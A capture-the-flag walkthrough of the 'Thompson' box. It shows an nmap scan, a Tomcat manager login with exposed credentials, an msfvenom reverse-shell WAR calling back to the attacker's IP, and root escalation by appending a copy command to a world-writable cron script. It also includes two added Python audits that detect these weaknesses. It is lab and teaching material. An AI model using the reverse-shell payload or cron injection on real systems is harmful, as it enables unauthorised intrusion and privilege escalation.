# Thompson

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQIQQgW-MxNEV7kfmp%2F-McQJ2k4ffYB79rncIY3%2Fimage.png?alt=media\&token=b227c79a-c5e9-4d1f-92b0-bc194ed6c605)

## Reconnaissance

Initial nmap scan to find open ports, using the "treat all hosts as alive" flag (**-Pn**) so nmap skips host discovery and scans the target even if it does not answer pings.

```
nmap -Pn 10.10.196.112
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJ7Bwd0qYH-yDl8cm%2F-McQJp4_7ZKc0Gm7SWgg%2Fimage.png?alt=media\&token=5ea0d7e5-1de1-45b1-9f9c-83890f806640)

Detailed Nmap scan:

Command breakdown:

* **-sV**: service version detection
* **-sC**: run the default nmap scripts
* **-p 22,8009,8080**: scan only ports 22, 8009 and 8080
* **-oN nmap**: save the output to a file called `nmap`

```
nmap -sV -sC -p 22,8009,8080 -oN nmap 10.10.196.112
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJ7Bwd0qYH-yDl8cm%2F-McQJs4hzlGltGjl8JND%2Fimage.png?alt=media\&token=19217956-865c-4b04-b01a-6b67b8b1e76a)

## Enumeration

Let's visit the site on port 8080.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQKGrlKH_0ZYifdhML%2Fimage.png?alt=media\&token=f37e8c76-66cc-400c-8a65-bcc39b515479)

It's the default Apache Tomcat page, and there is a Manager App link. Let's click it and see what it shows.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQKbk1iiVDapJPf9pq%2Fimage.png?alt=media\&token=3c3de40d-3424-4bf8-ac70-1ad83b27632f)

It asks for a username and a password, which we do not have, so let's click Cancel. Once we do, we get this page.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQKp8Gw-qfvV1hjdwJ%2Fimage.png?alt=media\&token=21faf68f-7854-4b8e-a0ae-136473372f30)

This page shows us a username and a password; let's use these credentials to log in.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQL-cqEdCnTurgNysW%2Fimage.png?alt=media\&token=6a8dac34-8b44-4b2c-ad93-79ac5fa210b3)

We are logged in. Looking through the application manager, we see something interesting.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQJtKLR2BNYERAuZlT%2F-McQLEnA8E2if4rw_8A2%2Fimage.png?alt=media\&token=9712d0c4-c5fb-46da-bb49-c62658bf39fa)

We can deploy `WAR` files, so we can build a WAR payload that gives us a reverse shell on the machine.
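The two weaknesses this box chains together are an account with manager roles whose password is guessable and a manager application reachable from anywhere. The script below is an added example (not part of the original writeup) that audits both from the files Tomcat actually reads: `conf/tomcat-users.xml` (accounts and roles) and `webapps/manager/META-INF/context.xml` (the `RemoteAddrValve` that normally limits the manager to localhost). The sample XML and the 12-character minimum are constructed for the example.

```python
"""Added example (not from the writeup): audit Tomcat manager exposure."""
import xml.etree.ElementTree as ET

# Roles that grant access to the manager or host-manager apps (real Tomcat role names).
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "admin-gui", "admin-script"}
# Roles that allow deploying a WAR, which is what the walkthrough abuses.
DEPLOY_ROLES = {"manager-gui", "manager-script"}
MIN_PASSWORD_LEN = 12  # assumption: a policy value chosen for this example


def _local(tag):
    """Strip the XML namespace that tomcat-users.xml declares."""
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, reason) findings for accounts that can reach the manager."""
    findings = []
    root = ET.fromstring(xml_text)
    for el in root.iter():
        if _local(el.tag) != "user":
            continue
        name = el.get("username") or ""
        password = el.get("password") or ""
        roles = {r.strip() for r in (el.get("roles") or "").split(",") if r.strip()}
        held = roles & MANAGER_ROLES
        if not held:
            continue  # ordinary application user, not interesting here
        deploy = sorted(held & DEPLOY_ROLES)
        if deploy:
            findings.append((name, "can deploy WAR files via " + ", ".join(deploy)))
        if not password:
            findings.append((name, "empty password on a manager account"))
        elif password.lower() == name.lower():
            findings.append((name, "password equals username"))
        elif len(password) < MIN_PASSWORD_LEN:
            findings.append((name, f"password shorter than {MIN_PASSWORD_LEN} characters"))
    return findings


def manager_ip_restricted(context_xml_text):
    """True if the manager's context.xml keeps a RemoteAddrValve with an allow list.
    Tomcat ships one limited to loopback; commenting it out (the parser drops
    comments) or deleting it exposes the manager to the whole network."""
    root = ET.fromstring(context_xml_text)
    for el in root.iter():
        if _local(el.tag) == "Valve" and el.get("className", "").endswith("RemoteAddrValve"):
            return bool(el.get("allow"))
    return False


# Constructed sample files, not taken from the box.
SAMPLE_USERS_XML = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <user username="admin" password="admin" roles="manager-gui,manager-script"/>
  <user username="deploy" password="Rk9vQ2x7LmPw4t" roles="manager-script"/>
  <user username="reader" password="short" roles="tomcat"/>
</tomcat-users>
"""

LOCKED_CONTEXT_XML = r"""<Context antiResourceLocking="false" privileged="true">
  <Valve className="org.apache.catalina.valves.RemoteAddrValve"
         allow="127\.\d+\.\d+\.\d+|::1|0:0:0:0:0:0:0:1"/>
</Context>
"""

OPEN_CONTEXT_XML = """<Context antiResourceLocking="false" privileged="true">
  <!-- valve removed: manager reachable from any address -->
</Context>
"""

if __name__ == "__main__":
    for user, reason in audit_tomcat_users(SAMPLE_USERS_XML):
        print(f"{user}: {reason}")
    print("manager IP-restricted (locked sample):", manager_ip_restricted(LOCKED_CONTEXT_XML))
    print("manager IP-restricted (open sample):  ", manager_ip_restricted(OPEN_CONTEXT_XML))
```

Either finding on its own is what makes the WAR upload possible: a weak password on a deploy-capable account, or a manager that anyone on the network can reach. Fixing both (long random passwords, and keeping the valve's allow list tight) closes the path used in this walkthrough.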

## Exploitation

Let's first make the payload; make sure to replace my IP (`LHOST`) with your own listening address.

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.13.8.64 LPORT=1234 -f war > reverse.war
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQLu2SCTUd4SQG2_5V%2Fimage.png?alt=media\&token=896170d3-3464-4d50-98a9-5dd62adb8ede)

Let's upload the file: click Browse and select the WAR file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQMBiBf0nMEGrqYwWi%2Fimage.png?alt=media\&token=f0e52be9-558d-4f22-8fb3-bd499ec516cf)

Then hit Deploy, and the new application should appear in the list.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQMJoXekquobxp-0pK%2Fimage.png?alt=media\&token=02c759e9-c58e-447e-8e72-ac7f438083c6)

Now let's start a netcat listener on the port we chose (1234).

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQMPOGjGCkW9qV34ve%2Fimage.png?alt=media\&token=9a17dc45-f60e-4252-a9fe-8062731e4e43)

Now click on the deployed application and you should get a reverse shell.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQMVkL9gbL8NYFInUJ%2Fimage.png?alt=media\&token=1e1a408b-5b66-487f-b80e-dfced611bc52)

Let's stabilize the shell with these commands:

```
python -c 'import pty; pty.spawn("/bin/bash")'   # spawn a proper pty on the target
# press Ctrl+Z to background the shell
stty raw -echo; fg                               # on your own terminal, then bring the shell back
reset                                            # redraw the terminal
```

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQNJeTivXRNZYeeuzR%2Fimage.png?alt=media\&token=fd856c93-6c66-4ef3-b922-b793889e56cf)

We can read the `user.txt` file.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQLjoVU5uruUUUZfla%2F-McQNp3X3T98Lfb0qzY3%2Fimage.png?alt=media\&token=c588f9db-e041-4b33-8f89-f5df306b149b)

There are two other files in the directory; let's look at what they contain.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQNqieiMk-OeGzXOlG%2F-McQO1VMc4u-gJFY6W-7%2Fimage.png?alt=media\&token=ae8d38a2-49ff-413c-8f56-b05e2b817c2f)

It looks like `id.sh` runs the `id` command and writes the output to `test.txt`. Let's check the cron jobs on this machine.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQNqieiMk-OeGzXOlG%2F-McQP9mTQXDlJ51OW780%2Fimage.png?alt=media\&token=c6434dcb-2ad1-4968-8c44-c9bb8cf2baec)

It looks like the cron job runs `id.sh` from `/home/jack`, a file we can write to, so let's have it copy the root flag into this directory by adding the command to `id.sh`, and then read it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQNqieiMk-OeGzXOlG%2F-McQPrIjHNRRp0fX3NZ5%2Fimage.png?alt=media\&token=576a3d7b-c6c6-4c0f-8a48-633a7d4c5654)

We can edit the file with `nano`, or append the command with:

```
echo "cp /root/root.txt /home/jack/root.txt" >> id.sh
```

Once the cron job has run again, we should see the `root.txt` file in our directory and we can read it.

![](https://1569822153-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Ma_-L-NUkJ1mxbddZG2%2F-McQNqieiMk-OeGzXOlG%2F-McQQFTwc4R2_YleMchf%2Fimage.png?alt=media\&token=82b8b8b6-0d39-4389-bd8b-92454275f695)
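The privilege escalation works because root's cron job executes a script that an unprivileged user owns and can edit. The audit below is an added example (not part of the writeup) that reads a crontab in the system format (`/etc/crontab`, `/etc/cron.d/*`: five time fields, a user, then the command), resolves which script each entry runs (including the `cd <dir> && bash script.sh` shape), and flags scripts that are writable by group or others, or owned by someone other than the cron user. The crontab and scripts it checks are constructed in a temporary directory; the entry shape is assumed from the walkthrough, not copied from the box.

```python
"""Added example (not from the writeup): find cron entries whose script a
non-privileged user could tamper with."""
import os
import pwd
import shlex
import stat
import tempfile
from dataclasses import dataclass, field


@dataclass
class Finding:
    user: str            # account the cron entry runs as
    script: str          # resolved path of the script it executes
    reasons: list = field(default_factory=list)


def _candidate_scripts(command):
    """Yield existing regular files the command refers to, resolving relative
    names against a preceding 'cd <dir>' the way the shell would."""
    cwd = "/"
    try:
        tokens = shlex.split(command)
    except ValueError:           # unbalanced quotes: fall back to whitespace split
        tokens = command.split()
    for i, tok in enumerate(tokens):
        if tok == "cd" and i + 1 < len(tokens):
            cwd = tokens[i + 1]
            continue
        path = tok if os.path.isabs(tok) else os.path.join(cwd, tok)
        if os.path.isfile(path):
            yield os.path.normpath(path)


def audit_crontab(text):
    """Return Finding objects for entries whose script is not safe to run as the cron user."""
    findings = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if line[0] == "@":                       # @reboot / @daily style entries
            parts = line.split(None, 2)
            expected = 3
        elif line[0].isdigit() or line[0] == "*":
            parts = line.split(None, 6)          # 5 time fields, user, command
            expected = 7
        else:
            continue                             # SHELL=, PATH= and similar assignments
        if len(parts) != expected:
            continue
        user, command = parts[-2], parts[-1]
        try:
            cron_uid = pwd.getpwnam(user).pw_uid
        except KeyError:
            cron_uid = None                      # unknown account: skip ownership check
        for script in _candidate_scripts(command):
            st = os.stat(script)
            reasons = []
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                reasons.append("writable by group or others")
            if cron_uid is not None and st.st_uid != cron_uid:
                reasons.append(f"owned by uid {st.st_uid}, not by the cron user {user}")
            if reasons:
                findings.append(Finding(user, script, reasons))
    return findings


def make_fixture():
    """Build a constructed crontab plus the two scripts it references; returns the crontab text."""
    base = tempfile.mkdtemp(prefix="cron-audit-")
    me = pwd.getpwuid(os.getuid()).pw_name
    home = os.path.join(base, "jack")
    os.makedirs(home)
    loose = os.path.join(home, "id.sh")          # the bad case: anyone can append to it
    with open(loose, "w") as f:
        f.write("id > test.txt\n")
    os.chmod(loose, 0o777)
    tight = os.path.join(base, "backup.sh")      # the good case: owner-writable only
    with open(tight, "w") as f:
        f.write("echo backup\n")
    os.chmod(tight, 0o755)
    return "\n".join([
        "SHELL=/bin/sh",
        "# constructed entries, not this box's real crontab",
        f"* * * * * root cd {home} && bash id.sh",
        f"0 3 * * * {me} {tight} --quiet",
        "",
    ])


if __name__ == "__main__":
    for finding in audit_crontab(make_fixture()):
        print(f"{finding.user} runs {finding.script}: {'; '.join(finding.reasons)}")
```

Run against a real `/etc/crontab` (`audit_crontab(open("/etc/crontab").read())`) the same function reports any root entry that points at a file a regular user can modify; the fix is to keep root-run scripts under a root-owned, `0755` directory rather than in a user's home.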
